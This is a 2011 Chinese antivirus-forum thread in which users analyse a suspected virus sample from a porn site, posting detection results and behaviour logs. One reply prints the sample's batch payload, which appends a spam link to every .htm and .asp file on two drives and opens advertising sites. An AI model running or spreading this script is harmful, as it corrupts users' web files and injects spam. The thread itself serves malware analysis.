楼主: foundking
收起左侧

[病毒样本] 在一个黄网上下到的东西,估计是病毒。请甄别

  [复制链接]
倾枫锝渔♂
发表于 2011-10-20 09:21:55 | 显示全部楼层
数字 云鉴定转人工
上报ESET看结果~~~
polluxkyo
头像被屏蔽
发表于 2011-10-20 09:25:46 | 显示全部楼层
FS 干掉了
wangjing520234
发表于 2011-10-20 09:25:47 | 显示全部楼层
ESS今天还没有报
liulangzhecgr
发表于 2011-10-20 09:39:32 | 显示全部楼层
2011-10-20 09:23:04    创建新进程    允许
进程: c:\windows\explorer.exe
目标: e:\downloads\一网打尽\一网打尽.exe
命令行: "E:\downloads\一网打尽\一网打尽.EXE"
规则: [应用程序]*

2011-10-20 09:23:27    修改注册表值    阻止
进程: e:\downloads\一网打尽\一网打尽.exe
目标: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b2ca5818-e31a-11e0-b48d-806d6172696f}\BaseClass
值: Drive
规则: [注册表]*

2011-10-20 09:23:51    创建文件    允许
进程: e:\downloads\一网打尽\一网打尽.exe
目标: C:\WINDOWS\temp\518670.bat
规则: [文件组]所有执行文件 -> [文件]*; *.bat

2011-10-20 09:24:46    修改注册表值    阻止
进程: e:\downloads\一网打尽\一网打尽.exe
目标: HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\WINDOWS\temp\518670.bat
值: 518670
规则: [注册表]*

2011-10-20 09:24:53    创建新进程    允许
进程: e:\downloads\一网打尽\一网打尽.exe
目标: c:\windows\system32\cmd.exe
命令行: cmd /c ""C:\WINDOWS\temp\518670.bat" 程序运行参数"
规则: [应用程序]*

2011-10-20 09:25:18    创建新进程    允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\cmd.exe
命令行: C:\WINDOWS\system32\cmd.exe /S /D /c" dir d:\ /s /b "
规则: [应用程序]*

2011-10-20 09:25:27    创建文件    允许
进程: c:\windows\system32\cmd.exe
目标: C:\WINDOWS\temp\1.txt
规则: [文件]*

2011-10-20 09:25:41    创建新进程    允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\find.exe
命令行: find /I ".htm"
规则: [应用程序]*

2011-10-20 09:26:03    创建新进程    允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\cmd.exe
命令行: C:\WINDOWS\system32\cmd.exe /S /D /c" dir d:\ /s /b "
规则: [应用程序]*

2011-10-20 09:26:09    创建新进程    允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\find.exe
命令行: find /I ".asp"
规则: [应用程序]*

2011-10-20 09:26:14    创建新进程    允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\cmd.exe
命令行: C:\WINDOWS\system32\cmd.exe /S /D /c" dir e:\ /s /b "
规则: [应用程序]*

2011-10-20 09:26:20    创建新进程    允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\find.exe
命令行: find /I ".htm"
规则: [应用程序]*

2011-10-20 09:26:24    创建新进程    允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\cmd.exe
命令行: C:\WINDOWS\system32\cmd.exe /S /D /c" dir e:\ /s /b "
规则: [应用程序]*

2011-10-20 09:26:32    创建新进程    允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\find.exe
命令行: find /I ".asp"
规则: [应用程序]*

2011-10-20 09:26:55    创建新进程    允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\explorer.exe
命令行: explorer.exe "http://a.54261.com/"
规则: [应用程序]*

2011-10-20 09:27:09    创建新进程    允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\explorer.exe
命令行: explorer.exe "http://www.lunlizy.org/yv/Index.html"
规则: [应用程序]*

2011-10-20 09:27:29    创建新进程    允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\explorer.exe
命令行: explorer.exe "http://www.zcmfw.com"
规则: [应用程序]*

2011-10-20 09:28:40    结束其他进程    允许
进程: c:\windows\explorer.exe
目标: c:\program files\internet explorer\iexplore.exe
规则: [应用程序]c:\windows\explorer.exe
liulangzhecgr
发表于 2011-10-20 09:45:09 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
andywangsc
发表于 2011-10-20 09:48:10 | 显示全部楼层
绅博周幸 发表于 2011-10-20 08:24

病毒研究员通知,你不是把金山清楚你的电脑了吗?怎么还有?
zhengyi197
发表于 2011-10-20 09:50:34 | 显示全部楼层
kis2012   miss
小墙头
发表于 2011-10-20 09:53:06 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
secowl
发表于 2011-10-20 10:02:22 | 显示全部楼层

Created process: (null),"C:\Windows\temp\484373.bat" 程序运行参数,C:\Windows\temp
Defined file type copied to Windows folder: C:\Windows\temp\484373.bat
Defined registry AutoStart location added or modified: machine\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5 = created registry key
Defined registry AutoStart location added or modified: machine\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9 = created registry key
secowl
发表于 2011-10-20 10:05:31 | 显示全部楼层
484373.bat

dir d:\ /s /b | find /I ".htm" >>1.txt
dir d:\ /s /b | find /I ".asp" >>1.txt
dir e:\ /s /b | find /I ".htm" >>1.txt
dir e:\ /s /b | find /I ".asp" >>1.txt

@for /f %%i in (1.txt) do echo ^<a href="http://www.zcmfw.com"^>^zcmfw^</a^>^ >> %%i

@del /s/f/q "d:\1.txt"
@del /s/f/q "e:\1.txt"

explorer.exe "http://a.54261.com/"
explorer.exe "http://www.lunlizy.org/yv/Index.html"
explorer.exe "http://www.zcmfw.com"
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-7 12:56 , Processed in 0.110297 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表